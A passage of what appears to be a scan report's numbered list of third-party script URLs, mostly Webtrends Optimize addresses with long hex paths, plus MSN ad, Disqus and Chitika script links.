f7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d
29.65. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e
29.66. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1e3b05f9a6f0b729a85efe7adb7fb8cf8eeb771dec2619c6e66228f7e802013802a70bf96b1c3ea19d97efe93fa6fb5ea74b545b1f6369884864c85e279fd5377162ab5cbea2665ceb2710c2aa521889f65cb9f85acd62a48c188452f8d5108fcdb073538598989008ca7f0ba4af4581f6d4a79c2f7c47cdcd7a2552be91b374aea6f476ccb905aa5a3d174e1a634cdb980d9d601c589313678623d87457b45e1f1e908c61532f25e3f94f63afa3f6db67e7007a14a6b7c710a8b5a35e27a0d4500847f80c0ebda463bc83a8189dd1d23b44666c6f0e2e2369b2e8a5dffca9a56c2278975ad05350150d5070b4c817a7105f1cc36df9be0da376750cc8ef217352a0ba380bf9a922864fe1d879913aa3b5d337305caf06e6482e85fb331c3d8ef5b24887216825952132a3d35aff60551fb92a69724812ffe64c7bc44d9cda7109fff75ecdefc7a580b5b015be0a2
29.67. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4ecb5eeb972d0fb6d8c27392b8f1fe14354db7a22e4f3f981b902d46ff783e47cf9a720ab7f8ad51ef99c9e5cceaa79b91552041ad9a79a692b84e621103aca09edf9249ed2df83f71d59ccc62356fa5168f2ca0f3f315ffb890f88d686c03ff64f777d5e1bbf9db672ada4c41e75e97a7c7ecc5f7a55ffc64ec4e19639b7820eeab9c3979112afef38467e754391361e4e91e0fc13bf0049e4212e9f91559c63359c257a75a15c6b001172fe4937f705511341db39b094acc560169b6ac1d5ed1752b30b5cd5e8a69d429d698147daacb730cc29fc60d071411a29ce700554cc273d409ac55da6eb9eba491035a7fc9371495675d590c2e2ea0819f20efec52fbc6148654a40d0d5333cdee40bc237d290ef3a55ef0473ee3d3174415824f7e05046e588ffd272df35a074edad59ce95a73fdbfd338a84b97405441e3baacf2880b37eb38bc03b8ec6130e8355f13082f285830ae14702ba6d55
29.68. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4f3b2ecaa7b9787268975646c9a6fe12e0dc96b33e5d7f4cfbd4c8b3fb389ac31f4b33b877f9a9e0ab4c5dd1a85e935f84d0f311689f4c87061deb765416dd916a4be71979f8ec8a34c06da9f6274d60a23ad9b1c367b4c85fe0699df97c83df65c6967397bd9edd304b9bcca55469f091879db220e21c48056caf3e341ca810df1dfdb8f8301c58931200004259f201f4ae197f61db2733ce4275be9e72fe1683799230f74c1350a09710efe594ee36a14527ee7039bd0e2c96e0d9d79dacfed1f62fc3c4b92a5f0b96ec20fda11f8dbd256a346ef03c869240646c3700554e268690b9aa736bee58de6154f6dd68f837e5e5476d1fec1e9ec5f73f10cfac52fea671f394a47d58734548db45cc30ad0c0ab24408f351d9809504f3121249a963f2a9ff8cdf343932db86683f208910246bbe0
29.69. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dce594e3d0e60b235269895e7baf9502a736d5a84b81ecc7b695dddf3bf515e70b0f61e903d0620220ef995b6766604ecdc6f9cffa4ffef19e7d66baea70381de7df55cf37dbe731091e6cb6a3905f846911248595aff0b1f6f3cdbfe3ac30d9c4678e383536c316f12914894b6effc4f298ac54cb7e8293fd68f6a36780748b8600e6979e42ced92cbc2e742b189ed2de622c89f6711a25da45f7eb77c18d8497be4c1899d26a72dc1268f2931c41435eea87148ad684c83cff5d6d663078d1efc44cf2e303e28add
29.70. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb
29.71. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc873419440ef867fa5712fc8cd9d589f6acaa54857770a79f59f4618f43dadef23cadec93964ed4b1e92d4a0d2076ce9ef36df78c97dfc78977bd6191d8ced1c3fb5760e1e47e4a45c795f13d92fda6a31a2c06cbc8a0c8e2a660ebbf5d623b135ad8ab210b8c645d4f6137873627d59f7fba294317baec039dc250131ca3fbe973a9a77984547c4816041b9c62
29.72. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1
29.73. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b
29.74. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3
29.75. http://rad.msn.com/ADSAdClient31.dll
29.76. http://rt.disqus.com/forums/realtime-cached.js
29.77. http://scripts.chitika.net/static/hq/lifescript.js
